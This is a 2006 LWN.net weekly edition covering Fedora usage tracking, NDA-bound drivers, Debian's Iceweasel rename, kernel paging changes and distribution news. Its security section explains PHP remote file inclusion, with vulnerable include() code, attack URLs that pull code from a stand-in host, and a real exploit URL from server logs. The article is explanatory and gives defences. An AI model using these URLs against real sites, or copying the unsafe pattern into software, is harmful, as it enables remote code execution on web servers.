LWN Weekly Edition
Leading itemsSecurity
Kernel development
Distributions
Development
Linux in the news
Announcements
->Multipage format
This page
Previous weekFollowing week
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
LWN.net Weekly Edition for October 12, 2006How many Fedora users are there?The Fedora Core 6 distribution is nearing release. Even after the recently announced delay, the final version of FC6 is expected to hit the net on October 17. So one would assume that there would be little call for controversial changes at this time in the cycle; the Fedora folks would be expected to be concerned with fixing the final problems and getting the release out the door. So the documentation group was a little surprised, at the end of September, when a request to modify the Firefox startup page showed up.In particular, the Fedora leadership wanted that page to include a tracking image - an image hosted on a Fedora web site which would allow the project to track how many people were starting up Fedora's version of Firefox, and which IP addresses they came from. It would appear that few people had any sense that there might be objections to this technique; the resulting discussion seemed to take them by surprise. But a discussion did result, focusing on a few questions: why does Fedora want to track its users, why the hurry to get this change into FC6, and isn't there a better way? At the moment, it seems, the Fedora Project has very little idea of how widely used their work is. That is an ignorance they share with a great many free software projects, but Fedora's situation, it seems, has the potential to make that ignorance expensive. The best description of Fedora's motives came from Greg DeKoenigsberg; it is worth quoting at length:
Really, this question should be asked this way: "are metrics so
important that you're ready to risk alienating some users and
contributors to get them?" And the answer to that question, from
my perspective, is "yes".
Why? Because, like it or not, every funding conversation inside of Red Hat's walls begins and ends with metrics. If it isn't measurable, it doesn't exist. Fact. This is especially important in the case of Fedora, because Fedora doesn't make any money directly for Red Hat. We continue to develop Fedora because it serves other purposes. Research and development. Quality Assurance for RHEL. The ethics of continuing to provide free software, which is important to all of us. And, most importantly from my own perspective, *community mindshare*. If we can't quantify Fedora's mindshare in some way, we lose one of the *major* rationales for making the Fedora Project stronger and more independent. Every time a Red Hat executive asks "how many Fedora users are out there?" and we answer "oh, somewhere between 100k and a few million," we make it *that* much more difficult to defend Fedora from bad Red Hat decisions. If a Red Hat executive has to choose between giving resources to RHEL and giving resources to Fedora, and if he's got dollar figures on one side of the ledger and hand-wavy "mindshare" guesses on the other side of the ledger, he's going to choose RHEL. Every single time. I've seen it happen, again and again and again and again. And again. Fedora has, slowly over the years, become a more open and transparent free software project. It is also clearly a successful project, with a large (if unknown) number of users worldwide. But the fact remains that Fedora is a Red Hat project, with Red Hat being the source of almost all of the funding that keeps Fedora going. This funding is a generous gift from Red Hat to the community (though Red Hat certainly benefits from it as well), but it puts Fedora into a strongly dependent position. Fedora must keep Red Hat happy, and convince Red Hat of its importance, if it is to continue to be funded properly. According to Max Spevack, there is no concern about Fedora funding being cut; this exercise is, instead, about getting that funding increased. But the evident level of concern belies that claim somewhat. Even if there is no discussion of cutting Fedora funding now, it seems like a subject which could come up in the future. Red Hat is becoming just another company in many ways, and it will make the calculations that companies need to make to survive. It would not take too many bad quarters for Red Hat to start looking very hard at the money spent on Fedora; managers under pressure to improve their numbers can be very short-sighted at times. So it makes sense for the Fedora project to be concerned about its ongoing relationship with Red Hat. It almost seems that something must have happened to reinforce this idea in the minds of the Fedora leadership. If so, they aren't talking about it. But they have decided that it is important to get some sort of mechanism into FC6 which would give them at least rudimentary statistics. Waiting another cycle for FC7, it seems is not an option. Given the short time available to put anything into FC6, the Fedora folks settled quickly on something which would be easy to implement: a tracking image. There are obvious problems with the tracking image idea, starting with the privacy concerns. Not everybody wants to be tracked in this way. People with this sort of concern may also not be much comforted by the Fedora privacy policy page, which leads off with this text:
THIS IS A DRAFT. It may not represent the final document, and
should not be used for anything other than informational purposes.
Beyond that, it has been pointed out that this technique only yields IP addresses, which will only be correlated with the number of actual installations in a very rough manner. But that information, it seems, is much better than nothing. There are alternatives. One idea which has been discussed is a brief user survey which shows up at the end of the installation process. Users could then provide some information - or, crucially, choose not to. Nobody seems to think that such a mechanism could be added to FC6 at this late date, however; though it could show up in FC7. The Fedora folks could also take advantage of the fact that a new Fedora installation already phones home. It is all for the best of purposes: the yum-updatesd daemon, which runs by default, goes to the central Fedora server to download the lists of repository mirrors. The project has not been using the tracks that this activity leaves - but they could. Greg describes it as "an absolute no-brainer":
The rich irony here, of course, is that rather than tell users
we're tracking them, we will instead be able to track them
invisibly through the normal operation of their systems. But I'm
perfectly happy either way, so.
This approach is not perfect either. It fails on systems which are offline, while every system running Firefox has a high probability of being connected. It also cannot distinguish systems which are likely to be "desktop" systems - information which is apparently of interest. But it's there now and, as Greg points out, it doesn't seem to set off alarms the way a tracking image would. Hopefully Fedora will share the conclusions it draws from this data - and make good use of it to convince Red Hat management of the project's importance.
Device drivers and non-disclosure agreementsAnybody who has been working with free software for any period of time knows that hardware support is often one of the community's thorniest problems. Manufacturers are often reluctant to tell their customers how to actually use the hardware they sell. For some strange reason, people buy that hardware anyway, and promptly want it to work with their operating system of choice. If that system is Windows, the manufacturer will usually provide a driver (of uncertain quality). Free software users, instead, are usually on their own.The situation is better now than it often has been in the past; free operating systems support a wide variety of hardware. In many cases, the vendors have given in and simply released programming information required for anybody to write a driver. In many others, however, this information is provided to a specific company or developer under a non-disclosure agreement (NDA), with the understanding that the resulting driver would then be released under a free license. This approach has, beyond a doubt, made more drivers available for use with our systems; it has become a common way of doing things, especially in the Linux world. Not everybody is happy with this state of affairs, however. OpenBSD founder Theo de Raadt has started a campaign against the practice of writing drivers under NDA; in the process, he has stepped on, if anything, more than the usual number of toes, to the point that some of the people involved are now refusing to talk to him. Theo's tactics are never subtle, but he does have a point which is worth listening to. At a first glance, a driver developed under NDA seems like a good thing. It is free software, after all, and it makes the device work under the target operating system. But these drivers can be problematic for the simple reason that they do not document the hardware the way the specification does. Without that documentation, many of the benefits of free software are lost. In many cases, only the original author can maintain a driver developed under NDA. Nobody else has the documentation required to make any real changes to how the driver operates; nobody else really understands the device. Whenever a new version of the hardware comes out, or whenever somebody needs a feature that the original author didn't see fit to implement, one can only hope that said author is still around and in a mood to work on that driver. This situation can be worse yet if the author who signed the NDA writes poor quality code, full of constants whose meaning is clear to nobody. In some cases, the vendor may require that the driver be written in that way in order to expose as little information about the hardware as possible. It's worth noting that this is a problem associated with poor hardware documentation in general. Your editor recently had cause to dig into the OmniVision OV7x20 sensor driver. The data sheet for this device can be found by anybody with access to a search engine, but that data sheet is little help for anybody trying to understand this code:
/* Settings for (color) OV7620 camera chip */
static struct ovcamchip_regvals regvals_init_7620[] = {
{ 0x12, 0x80 }, /* reset */
{ 0x00, OV7620_DFL_GAIN },
{ 0x01, 0x80 },
{ 0x02, 0x80 },
{ 0x03, OV7620_DFL_SAT },
{ 0x06, OV7620_DFL_BRIGHT },
{ 0x07, 0x00 },
{ 0x0c, 0x24 },
{ 0x0c, 0x24 },
{ 0x0d, 0x24 },
/* ... 45 lines of this stuff removed ... */
{ 0x74, 0x00 },
{ 0x75, 0x8e },
{ 0x76, 0x00 },
{ 0x77, 0xff },
{ 0x78, 0x80 },
{ 0x79, 0x80 },
{ 0x7a, 0x80 },
{ 0x7b, 0xe2 },
{ 0x7c, 0x00 },
{ 0xff, 0xff }, /* END MARKER */
};
It's not clear that anybody really knows what all those register settings do; they involve a number of bits and registers which are marked "reserved" in the documentation. For all practical purposes, they constitute a form of opaque firmware which must be loaded into the device for it to operate correctly. Pain will come to anyone who attempts anything more than the most trivial tweaks to these values. Similar issues (in an entirely different context) recently led Linus Torvalds to exclaim:
And we should tell all hardware companies that firmware tables are
stupid, and that we just want to know what the hell the registers
MEAN!
Without complete hardware documentation, we will not understand what our peripherals are doing. Finally, a big problem with drivers written under NDA is that they only work on one system, and they can be very little help for anybody trying to make the device work on a different kernel. That, of course, has a lot to do with why there is a lot of criticism of this approach coming from the BSD world while the Linux community tends to be more accepting of it. It is probably safe to say that most developers who are able to get this sort of access to documentation are working on Linux drivers. If we were pounding our heads against our monitors in an attempt to reverse-engineer hardware by way of obscure BSD drivers written under NDA, we might see the situation in a different light. Theo has picked out two targets for special attention: Intel and the One Laptop Per Child (OLPC) project. Intel has gotten a fair amount of good press supporting its hardware under Linux. The truth of the matter, however, is that a number of drivers for Intel hardware are written in-house, with little or no hardware documentation provided to the community. As long as Intel remains interested in maintaining those drivers, things will work well enough - for Linux users. BSD users are not so lucky, however, and we may all be out of luck if a change of management or focus at Intel causes the company to drop its Linux drivers. If Intel truly wants to be known as an open-source friendly company, it would do well to make its hardware truly open. The OpenBSD developers are currently running a campaign aimed at pushing Intel in that direction.
In the OLPC case, Theo's criticism has been centered upon (but not limited to) the driver for the Marvell wireless networking chip. Some very special things are being done with wireless on the OLPC, with the result that it will be able to function as a mesh network router with the CPU powered down. Enabling this involves a lot of close work with the chipset manufacturer - and a driver written under NDA. There are other NDA-covered drivers on the OLPC as well.
The OLPC folks have several responses to this criticism. The arrangement they have now, they say, is the best they could achieve within their particular set of goals - which, it should be remembered, is the provision of economical computers to children worldwide. OLPC was not founded with the primary goal of helping the free software community, though, in fact, that has been the result of much of its work. OLPC developers make the point that this computer will be one of the most open systems built in many years. The BIOS is free software, as is the VSA microcode which implements x86 emulation on the Geode CPU. The system's SD controller was redesigned (by Marvell) for the express purpose of allowing a driver to be written for it without having to sign the SD Association's particularly unpleasant NDAs. Even the firmware blob which runs on the wireless processor is slated for replacement with free software - though that code does not exist at this point. Meanwhile, work continues on getting the hardware documentation released. It should be remembered, however, that much of this hardware does not actually exist yet. It would be rare indeed for a manufacturer to openly release this sort of information for a product which is not yet generally available. OLPC's plan appears to be to continue to work with the vendors to get the documentation released as the hardware comes onto the market. Heavy-handed pressure tactics, they feel, would be counterproductive in the end. The crux of the matter, thus, is this: if we accept that the community needs open hardware documentation to function as it should, what is the best way to get vendors to release that documentation? Some groups encourage ongoing engagement with these companies, with the intent of guiding them toward open source enlightenment. Under this line of thought, these companies will come to realize that the community will do great things with their hardware - growing the market - given the right information; they will see that it is in their economic interest to make the documentation available. The contrary argument is that this approach has never worked well, that hardware companies will never be brought around in this way. What is required, instead, is an intransigent insistence that the documentation must be released from the outset, and a refusal to sign NDAs to get it. Only when the vendors see themselves locked out of the free software market entirely will they realize that their interest lies in openness, not secrecy. Until that time, there is no reason to cooperate with uncooperative vendors; the preferred approach, instead, would appear to be to attempt to shame them publicly. There has been enough history of drivers written under NDA that it should be possible to come to some sort of conclusion as to which approach is more effective. The OpenBSD camp has arguably had some high-profile success with the public shame approach. Corporate conversions through quiet engagement tend to be more, say, quiet, however. Your editor would be most interested to hear about examples of companies changing their approach to hardware documentation as a result of working with free software developers under NDA. The question is not just academic: if we want to bring about an improvement in the hardware documentation situation, it behooves us to understand which tactics work best.
Iceweasel == madness and fundamentalism?Steven J. Vaughan-Nichols is a mainstream technology reporter who has often shown a reasonably high level of clue regarding the free software community. A recent article, titled Open Source Madness!, shows where that clue ends, however. More to the point, it shows an area where the free software community is having a hard time making itself understood.The article in question takes issue with the Debian project's plan to drop Firefox from etch (see this LWN article from September for more information), and with the existence of Gnuzilla and Iceweasel, which are versions of the Mozilla suite and Firefox browser which are intended to be truly freely redistributable. Mr. Vaughan-Nichols presents the issue as being only about logos, calls the Debian developers "fundamentalists," and states:
By winning this "battle," the pedantic Debian developers have
helped the proprietary forces of Microsoft and friends far more
then the cause of Open Source.
So why is it that the Debian developers have done this terrible thing? Maybe it is time to look at the reasoning behind this move. The logo issue is real. It is provided under terms which are not compatible with the Debian Free Software Guidelines, and, as a result, cannot be shipped with the core Debian release. For some time, Debian was able to ship a version of Firefox without the logo, but Mozilla Corporation has called an end to that. As a result, Debian is in the position of being asked to ship something it sees as non-free. The logo issue might be enough to push Firefox out of a distribution like Debian, but there are more serious issues as well. The Mozilla trademark policy only allows a distributor to ship "Firefox" if it is an unmodified copy of what the Mozilla people have released. Some relatively trivial changes are allowed if the distributor calls the result the "Firefox Community Edition"; anything beyond that cannot use the name "Firefox" at all. The only exception is if explicit permission has been obtained from the Mozilla Corporation prior to distribution. Distributors often do want to make changes to Firefox - just like they change many other programs they ship. At a minimum, they often want to apply their own security fixes, since Mozilla's approach to security patches tends to be rather distributor-hostile. Having Mozilla review every patch as required will slow the process down, even if there are no disagreements about specific changes. This policy makes it hard to provide quick security updates to Firefox; this matters, especially, when a distributor is trying to maintain a version of the browser that Mozilla Corp. has long since abandoned. Perhaps most important, however, is this: even if a distributor gets permission to ship a specific modified version of Firefox, there is nothing which automatically gives anybody else that permission. Using one distribution as a base for another is a time-honored practice in the Linux community; there are, in fact, very few distributions out there which were truly started from scratch. But what is a distribution based on (say) Debian to do with a modified version of Firefox? The creator of the derived distribution has no permission from Mozilla Corporation to distribute that modified version - even if no further changes are made. The presence of this modified package creates a trap which any second-stage distributor must find and defuse; it makes the distribution less redistributable, less free. In the end, however, Mozilla's code is free software; all that is needed to avoid all of this trouble is to change its name. That is just what Debian is doing - and other distributors may yet follow suit. Mr. Vaughan-Nichols fears that this change will confuse users and send them screaming back to the comfort and stability of Windows. It would seem that the "Firefox" trademark has become so important that we must use it, or the dream of World Domination on the desktop will come to an untimely and ignominious end. "Freedom," says the article, "trumps common sense." The problems is...freedom is what this is all about. There would appear to be an increasing number of people who are calling for the community to "bend a little" on freedom in the name of winning the desktop battle. It may (or may not) be true that Linux could advance more quickly on the desktop if it were to become more like Windows. But what would be the point? If the choice is forced upon us, it would seem better to dispense with an overly-controlled name and keep our desktop free, supportable, and redistributable.
Security Remote file inclusion vulnerabilitiesA recent rash of reports to the bugtraq mailing list provides a nice confirmation of an article on this page two weeks ago. Google recently released a code search tool that is being used to find security holes in open source projects and the first target appears to be remote file inclusion (RFI) vulnerabilities in PHP programs. There has been a steady stream of vulnerability reports on security mailing lists as well as an increase in attempts to exploit them. An attacker's fondest wish is to be able to run their code on the target system; an RFI exploit does just that. By exploiting two very dubious 'features' of the PHP language, an attacker can inject their code into a PHP program on the server. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user. PHP is particularly susceptible to this kind of exploit because the default installation allows filesystem operations to 'automagically' open URLs as if they were local files (governed by the allow_url_fopen configuration parameter). This capability even works for what, seemingly, should be restricted to the local filesystem such as the 'include' and 'require' directives. If an attacker can manipulate the arguments to those directives, they can use a URL under their control as the argument and that is just what an RFI exploit does. Consider the following:
include($base_path . "/foo.php");
If an attacker can control the value of the base_path variable,
they can replace it with something like
"http://example.com/badcode?foo=" and,
instead of picking up foo.php from the local filesystem, PHP will happily reach out
across the net to pick up the attacker's code. One of the ways that an
attacker can control the value of a variable in a PHP program is through
the use of the register_globals PHP mis-feature.
When register_globals is enabled in PHP, the language 'automagically' instantiates variables with values from the HTTP request and puts them in the namespace of the PHP program. This was originally seen as a nice convenience for getting the FORM values from the page, but has since been deprecated and is disabled by default. There are still a fair number of PHP programs that require it to be enabled in order to function correctly; with luck this number is decreasing, hopefully rapidly. When it is enabled, it allows an attacker to inject a value for any uninitialized variable in the program by simply adding it as a GET parameter at the end of the URL. Using the example above, if base_path was uninitialized in some installations (for instance where the application was installed in the DocumentRoot), an attacker could request:
http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=
and PHP will fetch and execute the exploit code. The final question
mark and foo= in the URL is just to absorb the "/foo.php"
in the include directive; other techniques such as using %00 to
put a NUL byte at the end of the malicious URL are also possible.
Some PHP programmers are not content with being exploitable only when register_globals is on and have put code like the following into their applications:
include($_REQUEST['own_me'] . '/foo.php');
The _REQUEST 'superglobal' array in PHP stores all of the variables
that come in from the HTTP request, regardless of whether they come as a
GET or a POST variable. This one is easy to exploit by making a request
like:
http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode%00
By disabling both register_globals and allow_url_fopen, these kinds of exploits can be avoided. Unfortunately, the latter also alters the behavior of filesystem functions that might more legitimately be used to fetch remote URLs. For this reason, it is enabled by default and cannot be disabled for proper functioning of some PHP applications. There have been too many exploitable uses of register_globals over the years for any security-minded PHP programmer to even consider enabling it. Other languages may also be susceptible to this kind of exploit, but PHP is certainly the target of the recently reported ones. [Editor's note: the LWN server is currently seeing exploit attempts at a rate of nearly one per second, using URLs like:
http://lwn.net/Articles//master.php?root_path=http://webstorch.com//cap.txt?
No, it doesn't work here - but using wget to fetch the exploit file can be instructive. There is a steady stream of file inclusion vulnerability reports on lists like Bugtraq; if you are using PHP-based software, it behooves you to pay attention.]
New vulnerabilities awstats: input sanitizing
maxdb: arbitrary code execution
OpenSSH: denial of service
php: integer overflow
python: arbitrary code execution
Updated vulnerabilities apache: cross-site scripting
bind: denial of service
binutils: buffer overflow
busybox: insecure password generation
bzip2: race condition and infinite loop
capi4hylafax: missing input sanitizing
cheesetracker: buffer overflow
cpio: arbitrary code execution
vixie-cron: privilege escalation
cscope: buffer overflows
cscope: buffer overflows
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
dokuwiki: input validation flaws
ffmpeg: buffer overflows
flash-plugin: arbitrary code execution
freeradius: several vulnerabilities
freetype: integer overflows
gcc: file overwrite vulnerability
gdb: buffer overflow
gdm: improper file permissions
gedit: format string vulnerability
grip: buffer overflow
gzip: multiple vulnerabilities
gzip: arbitrary command execution
kdelibs: kate backup file permission leak
kernel: denial of service
kernel: denial of service by memory consumption
kernel: denial of service
krb5: local privilege escalation
libgadu: memory alignment bug
libgd2: denial of service
libmms: buffer overflows
libmusicbrainz: buffer overflows
libpam-ldap: authentication bypass
libpng: buffer overflow
libpng: heap based buffer overflow
libtiff: buffer overflow
libvncserver: authentication bypass
libwmf: integer overflow
libxml2 - arbitrary code execution
libxml2: multiple buffer overflows
lynx: arbitrary command execution
mailman: several vulnerabilities
migrationtools: insecure temporary files
mono: symlink vulnerability
firefox: multiple vulnerabilities
mutt: IMAP namespace buffer overflow
mysql: format string bug
MySQL: privilege violations
MySQL: logging bypass
nbd: arbitrary code execution
ncompress: buffer underflow
nss: signature forgery vulnerability
openldap: security bypass
openoffice.org: several vulnerabilities
openssh: remote denial of service
openssl: insufficient signature checking
openssl: multiple vulnerabilities
opera: RSA signature forgery
php: several vulnerabilities
phpbb2: missing input sanitizing
phpbb2: multiple vulnerabilities
phpMyAdmin: multiple vulnerabilities
postgresql: SQL injection
quake: buffer overflow
sendmail: denial of service
shadow-utils: mailbox creation vulnerability
texinfo: temporary file vulnerability
tin: buffer overflow
unzip: long file name buffer overflow
w3c-libwww: possible stack overflow
webmin: cross-site scripting
wireshark: several vulnerabilities
xine-lib: code execution
xine-lib: buffer overflow
xine-ui: format string vulnerabilities
X.org: local privilege escalations
X.Org: buffer overflow
xorg-x11: privilege escalation
xpdf: buffer overflow
xpdf: integer overflows
Resources Report: Vulnerability type distributions in CVESteve Christey at MITRE has done a bunch of statistics crunching on five years of CVE vulnerability entries. The resulting report makes interesting reading. "Format string vulnerabilities appear more frequently in open source. There are probably several factors. First, susceptible API library calls such as printf() are easily found in source code using crude methods, whereas binary reverse engineering techniques are not conducted by many researchers (this might also be an explanation for symbolic link issues). Second, many format string problems seem to occur in rarely-triggered error conditions, which makes them more difficult to test with black box methods."
Page editor: Jonathan Corbet Kernel development Brief items Kernel release statusThe current 2.6 prepatch is 2.6.19-rc1, released on October 4, several milliseconds after last week's Kernel Page was published. For a summary of changes, see this article and this one from the last two weeks. Highlights include the parallel ATA driver set, labeled networking for IPsec and CIPSO security, a few new architectures, lots of new drivers, the GFS2 cluster filesystem, eCryptfs, and large numbers of internal changes.The long-format changelog has the details - but, since we're talking about almost 5000 patches from over 600 contributors, it's best to have a lot of time on one's hands. The short-form changelog is somewhat more compact, but still lengthy. At this point in the process, patches going into the mainline repository are supposed to be confined to fixes. Many of them are, but Linus has merged a few other significant changes, including, as predicted, the interrupt handler prototype change, which has caused changes throughout the tree. There is a new epoll_pwait() system call which takes an additional signal mask parameter, and the venerable (but long-unused) <linux/config.h> include file has been removed at last. Also merged is the developmental ext4 filesystem, which includes a number of enhancements, including support for extents and 48-bit block numbers. See the ext4 documentation file if you are interested in playing with ext4 (and have good backups). The current -mm tree is 2.6.19-rc1-mm1. Recent changes to -mm include the addition of ext4 (which promptly moved on into the mainline), continued work on the swap token mechanism, a generic log2() implementation, and the dynamic tick patch.
Kernel development news Quote of the week
Maintaining drivers out of tree is shameless autoflagellation at
the best of times. We really don't care -- if we didn't make life
hard for them in this way they'd only go and stick pins under their
fingernails to make up for the lack of pain. If you think about it
like that, we're probably doing them a favour -- at least this way
they're _safe_.
Faulting out populate(), nopfn(), and nopage()The nopfn() VMA operation was added for 2.6.19-rc1; see this article from last month for information on this method. It turns out, though, that nopfn() might just be one of the shortest-lived kernel API extensions in some time; Nick Piggin has posted a series of patches which will bring significant changes to how page faults are handled at the lowest levels.The 2.6.19-rc1 vm_operations_struct structure defines three methods which handle low-level paging:
struct page *(*nopage)(struct vm_area_struct *area,
unsigned long address, int *type);
unsigned long (*nopfn)(struct vm_area_struct *area,
unsigned long address);
int (*populate)(struct vm_area_struct *area, unsigned long address,
unsigned long len, pgprot_t prot,
unsigned long pgoff, int nonblock);
Ordinarily, page faults are handled by nopfn() (if it exists) or nopage(). Those functions are supposed to take the given address and associate it with a page in physical memory. For virtual memory areas (VMAs) which are backed up by files, the virtual filesystem layer reacts to a nopage() call by allocating a page of memory, reading the appropriate contents from backing store, then passing the page back to the kernel for insertion into the page tables. Device drivers which implement nopage() typically just translate the address into an appropriate pointer for an in-memory buffer being mapped into user space. Both nopfn() and nopage() assume that the mapping between virtual memory addresses and the offset within the VMA is linear - that is why only the address is provided as a parameter. The kernel, however, also supports nonlinear mappings, where an application can turn a VMA into a complex window into different parts of the backing file. The nopfn() and nopage() methods cannot handle these mappings, since they do not have the required information. Instead, any backing store which supports nonlinear mappings must provide a populate() method, which has parameters for both the virtual memory address and the associated offset (pgoff) into the backing store device. Enter Nick, who was working on a tricky race condition found within one of the most notoriously tricky parts of the kernel: the code which handles file truncation. In some conditions, a page which was being removed as a result of a truncate() call could be simultaneously faulted in via nopage(), leading to memory management confusion. While rethinking the locking rules for these operations, Nick decided that there should be a better way. The result was a new VMA operation called fault():
struct fault_data {
struct vm_area_struct *vma;
unsigned long address;
pgoff_t pgoff;
unsigned int flags;
int type;
};
struct page *(*fault)(struct vm_area_struct *vma,
struct fault_data *fdata);
This method is intended to replace all of nopfn(), nopage(), and populate(). When a page fault happens, the kernel fills in the fault_data structure with the needed information: the user-space address associated with the fault, the corresponding offset pgoff, and a couple of flags which indicate whether the fault happened on a write access and whether a nonlinear mapping is involved. The fault() function should locate a page which can satisfy a request for the offset pgoff; it won't normally need address at all. The function can then either return the associated struct page, or set the page table entry directly (with something like vm_insert_page()) and return NULL. Either way, the type field should be set to the type of fault (major or minor). If the fault cannot be handled, the appropriate error code should be put into type instead. Nick's patch gets rid of the nopfn() and populate() methods immediately. There is currently only one user of nopfn(), and the older populate() API has never been widely used outside of the mainline kernel. The install_page() function is also destined for a near-term demise. The nopage() method, instead, is widely used by device drivers, inside and outside of the mainline. So it has been marked as deprecated and scheduled for removal one year from now, in October, 2007. There have been suggestions that nopage() should go sooner (after six months, say), but no definitive decision. Details like that aside, there appears to be broad support for this change. These patches would probably be a bit too new for 2.6.19, even if the merge window were still open, so 2.6.20 is the earliest likely date for them to appear in the mainline. But, at that point, driver and out-of-tree filesystem maintainers will have some updating to do.
Sleepable RCU
However, the realtime kernels that require spinlock critical sections be preemptible [3] also require that RCU read-side critical sections be preemptible [2]. Preemptible critical sections in turn require that lock-acquisition primitives block in order to avoid deadlock, which in turns means that both RCU's and spinlocks' critical sections be able to block awaiting a lock. However, these two forms of sleeping have the special property that priority boosting and priority inheritance may be used to awaken the sleeping tasks in short order. Nevertheless, use of RCU in realtime kernels was the first crack in the tablets of stone on which were inscribed ``RCU read-side critical sections can never sleep''. That said, indefinite sleeping, such as blocking waiting for an incoming TCP connection, is strictly verboten even in realtime kernels. Quick Quiz 1: Why is sleeping prohibited within Classic RCU read-side critical sections? Quick Quiz 2: Why not permit sleeping in Classic RCU read-side critical sections by eliminating context switch as a quiescent state, leaving user-mode execution and idle loop as the remaining quiescent states? (Click below for the rest of this lengthy, technical article - and the answers to the quick quiz questions).
The Video4Linux2 API: an introductionYour editor has recently had the opportunity to write a Linux driver for a camera device - the camera which will be packaged with the One Laptop Per Child system, in particular. This driver works with the internal kernel API designed for such purposes: the Video4Linux2 API. In the process of writing this code, your editor made the shocking discovery that, in fact, this API is not particularly well documented - though the user-space side is, instead, quite well documented indeed. In an attempt to remedy the situation somewhat, LWN will, over the coming months, publish a series of articles describing how to write drivers for the V4L2 interface.V4L2 has a long history - the first gleam came into Bill Dirks's eye back around August of 1998. Development proceeded for years, and the V4L2 API was finally merged into the mainline in November, 2002, when 2.5.46 was released. To this day, however, quite a few Linux drivers do not support the newer API; the conversion process is an ongoing task. Meanwhile, the V4L2 API continues to evolve, with some major changes being made in 2.6.18. Applications which work with V4L2 remain relatively scarce. V4L2 is designed to support a wide variety of devices, only some of which are truly "video" in nature:
Other types of devices are possible. The V4L2 API has some stubs for "codec" and "effect" devices, both of which perform transformations on video data streams. Those areas have not yet been completely specified, however, much less implemented. There are also the "teletext" and "radio data system" interfaces currently implemented in the older V4L1 API; those have not been moved to V4L2 and there do not appear to be any immediate plans to do so. Video devices differ from many others in the vast number of ways in which they can be configured. As a result, much of a V4L2 driver implements code which enables applications to discover a given device's capabilities and to configure that device to operate in the desired manner. The V4L2 API defines several dozen callbacks for the configuration of parameters like tuner frequencies, windowing and cropping, frame rates, video compression, image parameters (brightness, contrast, ...), video standards, video formats, etc. Much of this series will be devoted to looking at how this configuration process happens. Then, there is the small task of actually performing I/O at video rates in an efficient manner. The V4L2 API defines three different ways of moving video data between user space and the peripheral, some of which can be on the complex side. Separate articles will look at video I/O and the video-buf layer which has been provided to handle common tasks. Subsequent articles will appear every few weeks, and will be added to the list below:
Patches and updates Kernel trees
Core kernel code
Development tools
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Security-related
Miscellaneous
Page editor: Jonathan Corbet Distributions News and Editorials Debian's General ResolutionsDebian developers have no less than four issues to vote on this week. The voting period for all of them closes at the end of the day, October 14, 2006. Hopefully these issues will soon be resolved, however we cannot be certain because "further discussion" is an option on all of the ballots.The General Resolution to clarify the scope and applicability of item 2 of the Debian free software guidelines (DFSG) has gotten a second call for votes. The full text of this resolution contains all the nitty gritty details, but basically this one says that the DFSG applies to firmware as well as software. The next GR (call for votes / full text) covers the handling of source-less firmware in the Linux kernel. While progress has been made since the Sarge release in terms of removing source-less/non-free firmware from the main archive, there is still enough that it comes down to a choice between removing all of it or releasing Etch on schedule. Since it will not be possible to do both, this GR provides for the release of Etch even with kernel firmware issues, or it could grant a special exception to DFSG2 for firmware as long as required. Those two votes are intertwined. If it is determined that the DFSG2 has a narrow focus there will be fewer firmware issues to deal with. Even if the DFSG2 is given a broad interpretation, the second GR makes it possible to release Etch on schedule. The next two GRs are also intertwined. In light of the Dunc-tank controversy the Debian developers may now vote to recall the project leader or reaffirm support for the project leader. Anthony Towns has released a caretaking memo, delegating his DPL duties to various people at least until a decision is reached. Presumably these people will continue on in case of a recall, until a new leader is elected. Once these issues are resolved we can get back to the Bug Squashing Marathon, currently in progress.
New Releases openSUSE 10.2 Alpha5 (DVDs, i386, x86-64 only) availableopenSUSE 10.2 Alpha5 is out. "We only have DVDs for i386 and x86-64 this time. They are available via ftp.opensuse.org and its mirrors. Mini-ISOs for remote installation are available as well. So, there are neither CDs nor deltas."
Distribution News Fedora Core 6 release date pushed backThe release date for Fedora Core 6 has been pushed back to October 17. It seems that there are a few troublesome problems needing to be fixed before the Fedora developers are ready to send this release out into the wild. "Your extra careful testing of rawhide over the next few days would greatly be appreciated."
Worldwide 2007 Mandriva Linux Install FestMandriva is mobilizing its network of Linux User Groups (LUGs) to coordinate a worldwide Installfest on October 21 2006. "Installations of Mandriva Linux One and Free will take place all around the world, thanks to the Linux community. Major participating locations will include the United States, China, Poland, Argentina and France. Last year, Mandriva install fests gathered more than 1,500 participants in more than 60 cities in 20 countries such as the United States, Argentina, China and Morocco. This major event was covered on TV, radio and in the press."
Ubuntu 6.10 freeze imminentThe release candidate freeze for Ubuntu 6.10 should be in effect now. "During this time, uploads should be made only for changes which are critical for the release, and must be approved by the release team. As we work to prepare the release, further information about these restrictions may be announced."
Debian etch freeze to be delayedIt seems that there are too many known release-critical bugs in the etch distribution, scheduled to be released by the end of this year. So the full freeze of this distribution will be delayed for an unspecified (but intended to be short) period of time "We haven't chosen a date yet, but you can still expect it to happen in October or early November."
Debian BSP Marathon continuesThe next Debian bug squashing party will be in Munich on October 13 - 15, 2006.
Distribution Newsletters Fedora Weekly News Issue 61The Fedora Weekly News covers Fedora Core 6 release date slip, FC6 Pre-release (Test4), Ohio Linux Fest 2006 Summary, One Laptop Update, Red Hat KDE conference talk, High-tech social enterprise reaps free software's benefits, and other topics.
